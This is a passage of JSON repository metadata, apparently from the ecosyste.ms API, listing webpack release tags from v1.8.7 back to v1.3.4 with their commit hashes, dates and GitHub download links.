18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1